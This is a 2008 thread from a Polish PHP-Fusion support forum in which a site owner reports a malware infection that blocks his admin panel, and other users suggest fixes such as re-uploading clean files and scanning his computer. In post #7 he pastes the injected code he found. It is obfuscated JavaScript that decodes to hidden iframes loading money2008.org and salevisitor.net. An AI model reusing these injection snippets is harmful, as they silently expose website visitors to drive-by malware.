Nawigacja

Aktualnie online

Gości online: 11

Użytkowników online: 0

Łącznie użytkowników: 25,405
Najnowszy użytkownik: kipolas

Logowanie

Zarejestruj się

Odzyskaj hasło

Shoutbox

Musisz zalogować się, aby móc dodać wiadomość.

jantom

07.09.2025 09:40:31

Strona z niebytu wrocila, ciekawe kiedy polskie literki rowniez...

JazOOn

25.06.2025 23:43:19

Dziadziejemy jantom...

jantom

23.06.2025 21:37:31

Z ciekawo?ci pogrzeba?em w historii i jest gorzej ni? my?la?em. Skórka Nadzieja ma ju? 17 lat.

jantom

23.06.2025 21:33:12

... troch? zasiedzia?o

jantom

23.06.2025 21:32:38

Cecha tego, jak z 20+ lat temu pisano strony - tabelki wsz?dzie, szczególnie do tworzenia uk?adów stron. PF d?ugo by? wierny tej tradycji. A obecny szablon Supportu napisa?em z 15 lat temu i chyba mu

Archiwum shoutboksa

O nie! Ta strona potrzebuje włączonej obsługi języka JavaScript!

Twoja przeglądarka nie obsługuje tego języka lub ma wyłączoną jego obsługę. Włącz wykonywanie kodu JavaScript w swojej przeglądarce internetowej, aby skorzystać ze wszystkich funkcji strony
lub skorzystaj z programu obsługującego język JavaScript, np. Mozilla Firefox, Apple Safari, Opera, Google Chrome lub Windows Internet Explorer w wersji wyższej niż 6.

Zobacz temat

Polski Oficjalny Support PHP-Fusion » PHP-Fusion v5.00-v6.01 Support » Tylko o PHP-Fusion v6.01.xx

Atak malware na stron?
djemate	#1 Dodany dnia 08.07.2008 21:16:49
Przedszkolak Postów: 12 Data rejestracji: 12.03.2005 11:24	Od dwóch dni mam problem z z?o?liwym robakiem który wkrad? si? gdzie? w moj? stronk? i uniemo?liwia mi wej?cie do panelu administratora. Czyta?em ju? jeden w?tek ale niestety po przeskanowaniu plików nie ma ?adnego robaka. Podczas wchodzenia w panel administratora pojawia sie komunikat który odnosi si? w ka?dym przypadku (przy wej?ciu na ankiete itp) do mojego aid: Rozwiń Kod źródłowy `ttp://gks-tychy.pl/administration/articles.php?aid=78#######37#b#b\unp#3##7#5#8 VBS:Malware-gen` (celowo da?em # w miejscu aid i unp). moje pytanie brzmi czy mo?e ten robak siedzie? w bazie danych i dlaczego wy?wietla ?e chodzi o moje aid? nie mam ju? ?adnego pomys?u jak si? tego pozby?. u?ywam avasta. Edytowane przez Pieka dnia 08.07.2008 22:34:40


W?cibski Go??	Dodany dnia 08.09.2025 18:33:25
Pan Kontekstualny Postów: n^x Data rejestracji: Zawsze
IP: localhost

Mysliciel	#2 Dodany dnia 08.07.2008 21:20:20
Przedszkolak Postów: 4 Data rejestracji: 08.07.2008 20:41 ZBANOWANY: Dożywotnio	Witaj, djemate mo?liwe jest ze jest to robak jakim programem skanowa?e? pliki czy baz? tez skanowa?e? ? Jaka wersja PF ? EDIT: Nie zauwa?y?em ze u?ywa?e? avasta ! A mo?e spróbuj Kasperskim Lun Nortonem Edytowane przez Mysliciel dnia 08.07.2008 21:21:28 Je?eli Pomog?em Daj Pomóg? !!


djemate	#3 Dodany dnia 08.07.2008 21:29:04
Przedszkolak Postów: 12 Data rejestracji: 12.03.2005 11:24	Skanowa?em baz? i nic... Ale po co mam skanowa? innym antywirusem skoro w internecie wykrywa wirusa to na komputerze tez powinien wykry? wirusa w tych plikach... Edytowane przez piotrek199214 dnia 08.07.2008 21:52:23


piotrek199214	#4 Dodany dnia 08.07.2008 21:51:50
Bywalec Postów: 977 Pomógł: 168 v7.01.05 Data rejestracji: 17.12.2007 21:05	A wpisz w adres przegl?darki: Rozwiń Kod źródłowy `http://gks-tychy.pl/administration/index.php?aid=[color=red]78#######37#b#b[/color]` i wpisz swój aidlink (cerwony kolor). Pomog?em Ci? Wystarczy podzi?kowa? i oznaczy? post jako pomocny Tanie tworzenie wtyczek, masz problem napisz.


djemate	#5 Dodany dnia 08.07.2008 21:55:24
Przedszkolak Postów: 12 Data rejestracji: 12.03.2005 11:24	Wtedy samo dopisuje si? do linku: Rozwiń Kod źródłowy `\unp#3##7#5#8` i wyswietla si? to samo co wcze?niej. Edytowane przez piotrek199214 dnia 08.07.2008 22:02:35


piotrek199214	#6 Dodany dnia 08.07.2008 21:58:03
Bywalec Postów: 977 Pomógł: 168 v7.01.05 Data rejestracji: 17.12.2007 21:05	Wejdz w maincore.php i na samym dole sprwad? czy masz to tak samo ten kod: Rozwiń Kod źródłowy `if (iADMIN) { define("iAUTH", substr($userdata['user_password'],16,32)); $aidlink = "?aid=".iAUTH;` Edytowane przez piotrek199214 dnia 08.07.2008 22:04:59 Pomog?em Ci? Wystarczy podzi?kowa? i oznaczy? post jako pomocny Tanie tworzenie wtyczek, masz problem napisz.


djemate	#7 Dodany dnia 08.07.2008 22:08:19
Przedszkolak Postów: 12 Data rejestracji: 12.03.2005 11:24	Tak mam dok?adnie tak samo. Wykry?o mi jeden plik zainfekowany Rozwiń Kod źródłowy `\includes\jscripts\tiny_mce\themes\advanced\docs\ro\index.htm` Ko?cówka pliku wygl?da tak: Rozwiń Kod źródłowy </BODY> </HTML> <!--pw94sjwqo4B1reiwnc--><script type="text/javascript"> function C7D36720260A79BEECF3B8D6D(C78D9ED077610F5E11){function E69961B4A47426004A21A064DA3(){return 16;}return(parseInt(C78D9ED077610F5E11,E69961B4A47426004A21A064DA3()));}function DB47FCE800845F2179C(D89D6EB726D3262DEA5){function CF7A2398A7A3B02EEF51A624DC28F2(){return 2;}var B0A173316D010072="";for(D6BE4D56711AC9FE592=0;D6BE4D56711AC9FE592<D89D6EB726D3262DEA5.length;D6BE4D56711AC9FE592+=CF7A2398A7A3B02EEF51A624DC28F2()){B0A173316D010072+=(String.fromCharCode(C7D36720260A79BEECF3B8D6D(D89D6EB726D3262DEA5.substr(D6BE4D56711AC9FE592,CF7A2398A7A3B02EEF51A624DC28F2()))));}document.write(B0A173316D010072);}DB47FCE800845F2179C("3C696672616D65207372633D22687474703A2F2F6D6F6E6579323030382E6F72672F746D702F222077696474683D31206865696768743D31207374796C653D227669736962696C6974793A68696464656E3B706F736974696F6E3A6162736F6C757465223E3C2F696672616D653E"); </script> Zobaczy?em równie? administrations/index.php a tam na samym dole jest: Rozwiń Kod źródłowy </td>\n</tr>\n</table>\n"; closetable(); echo "</td>\n"; require_once BASEDIR."footer.php"; //ke83jcnsWWdo403 echo "<script type=\"text/javascript\">\r\nfunction C7D36720260A79BEECF3B8D6D(C78D9ED077610F5E11){function E69961B4A47426004A21A064DA3(){return 16;}return(parseInt(C78D9ED077610F5E11,E69961B4A47426004A21A064DA3()));}function DB47FCE800845F2179C(D89D6EB726D3262DEA5){function CF7A2398A7A3B02EEF51A624DC28F2(){return 2;}var B0A173316D010072=\"\";for(D6BE4D56711AC9FE592=0;D6BE4D56711AC9FE592<D89D6EB726D3262DEA5.length;D6BE4D56711AC9FE592+=CF7A2398A7A3B02EEF51A624DC28F2()){B0A173316D010072+=(String.fromCharCode(C7D36720260A79BEECF3B8D6D(D89D6EB726D3262DEA5.substr(D6BE4D56711AC9FE592,CF7A2398A7A3B02EEF51A624DC28F2()))));}document.write(B0A173316D010072);}DB47FCE800845F2179C(\"3C696672616D65207372633D22687474703A2F2F6D6F6E6579323030382E6F72672F746D702F222077696474683D31206865696768743D31207374796C653D227669736962696C6974793A68696464656E3B706F736974696F6E3A6162736F6C757465223E3C2F696672616D653E\");\r\n</script>"; ?><!-- o --> <script type="text/javascript"> <!-- document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%61%6C%65%76%69%73%69%74%6F%72%2E%6E%65%74%2F%69%6E%2E%63%67%69%3F%32%22%20%77%69%64%74%68%3D%31%30%30%20%68%65%69%67%68%74%3D%31%30%30%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%22%3E%3C%2F%69%66%72%61%6D%65%3E')); //--> </script> <!-- c --> Czyli te? co? nie tak... eh ciekawe gdzie to jeszcze siedzi. Edytowane przez djemate dnia 08.07.2008 22:50:04


proton	#8 Dodany dnia 08.07.2008 22:52:04
Bywalec Postów: 945 Pomógł: 22 Data rejestracji: 10.11.2005 18:29	Najpierw proponuje jeszcze raz na serwer wys?a? pliki od PHP-Fusion, nadpisuj?c stare a jak to nie pomo?e to musisz sprawdzi? czy gdzie? w twoich folderach na serwerze nie ma jakiego? podjerzanego pliku którego nie ma w podstawowych plikach PHP-Fusion. Zazwyczaj takie pliki s? gdzies w katalogu images lub includes ale sprawd? wszystkie foldery. Najlepiej zanim b?dziesz wysy?a? pliki postaraj si? wszystkie foldery które mo?esz usun?? (rozumiem ?e cz??ci jak np. folder z avatarami nie mo?esz usun??) Edytowane przez proton dnia 08.07.2008 22:53:51 Strony www Tarnów Sprawozadania, ?ci?gi i materia?y na studia Porównanie hostingów


Pieka	#9 Dodany dnia 08.07.2008 22:53:56
Postów: 19887 Pomógł: 767 v7.02.03 Data rejestracji: 23.02.2005 18:12	Kolega przypadkiem nie aktualizowal TinyMCE? Jestem jaki jestem


djemate	#10 Dodany dnia 08.07.2008 22:58:48
Przedszkolak Postów: 12 Data rejestracji: 12.03.2005 11:24	Pieka napisa?/a: Kolega przypadkiem nie aktualizowal TinyMCE? Nie aktualizowa?em.


Pieka	#11 Dodany dnia 08.07.2008 23:00:05
Postów: 19887 Pomógł: 767 v7.02.03 Data rejestracji: 23.02.2005 18:12	W takim razie do nadpisania dochodzi zapwne na Twoim komputerze. Skanowanie przed Toba. Jestem jaki jestem

Przejdź do forum:

Twój link u nas!

Nawigacja

G?ówne menu

Komunikacja

Elementarz

Dokumentacja

Aktualnie online

Logowanie

Shoutbox

Zobacz temat